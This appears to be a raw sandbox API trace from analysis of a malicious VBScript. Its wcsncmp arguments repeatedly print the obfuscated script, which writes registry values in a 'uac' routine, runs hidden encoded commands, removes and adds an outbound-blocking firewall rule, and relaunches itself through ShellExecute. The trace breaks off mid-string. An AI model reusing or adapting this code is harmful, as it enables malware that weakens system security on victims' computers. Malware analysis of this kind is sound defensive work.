bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.334] wcsncmp (_String1="eObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.334] wcsncmp (_String1="Object(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.334] wcsncmp (_String1="bject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.334] wcsncmp (_String1="ject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93 [0226.334] wcsncmp (_String1="ect(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim 